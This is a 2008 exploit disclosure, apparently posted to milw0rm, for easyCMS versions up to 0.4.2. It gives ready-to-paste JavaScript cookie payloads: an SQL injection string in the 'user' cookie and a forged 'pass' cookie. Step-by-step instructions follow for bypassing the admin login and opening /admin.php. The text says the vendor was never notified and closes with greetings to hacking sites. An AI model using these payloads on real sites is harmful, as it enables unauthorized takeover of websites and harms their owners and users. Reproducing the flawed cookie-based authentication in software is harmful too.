1 −−==+================================================================================+==−−
2 −−==+
easyCMS <= 0.4.2 Multiple Remote Vulnerabilitys +==−−
3 −−==+================================================================================+==−−
4
5
6
7 Discovered By: t0pP8uZz
8 Discovered On: 17 MAY 2008
9 Script Download: http://ecomansys.sourceforge.net/
10 DORK: N/A
11
12
13
14 Vendor Has Not Been Notified!
15
16
17
18 DESCRIPTION:
19
20 eCMS (all versions avalible) suffers from multiple remote vulnerabilitys.
21
22 these include, Insecure Cookie Handling, SQL Injection. the version <= 0.2 allows a admin cookie to be set and
23 grant full access to the admin area.
24
25 versions => 0.2 allows a simple sql statement to be inserted into the cookie bypassing the admin login.
26
27 see below for the vulnerabilitys.
28
29
30
31 SQL Injection (version => 0.2):
32
33 javascript:document.cookie = "user=’ or ’1’=’1; path=/";
34 javascript:document.cookie = "pass=admin; path=/";
35
36 before running the above javascript in your browser, replace "admin" with the actual admin username.
37 most of the time "admin" should work. after running both javascripts on the affected website.
38 you can visit "/admin.php" to view admin panel.
39
40
41
42 Insecure Cookie Handling (version <= 0.2):
43
44 javascript:document.cookie = "pass=1; path=/";
45
46 running the above javascript on a eCMS version <= 0.2 will grant admin access, after running visit "/admin.php"
47
48
49
50 NOTE/TIP:
51
52 no dork, since people replace the dork in "config.php"
Page 1/2
easyCMS 0.4.2 Multiple Remote Vulnerabilities
t0pP8uZz
05/18/2008
53
54
55 GREETZ: milw0rm.com, h4ck−y0u.org, CipherCrew !
56
57
58
59 peace, t0pP8uZz
60
61
62
63 −−==+================================================================================+==−−
64 −−==+
easyCMS <= 0.4.2 Multiple Remote Vulnerabilitys +==−−
65 −−==+================================================================================+==−−
66
67 # milw0rm.com [2008−05−18]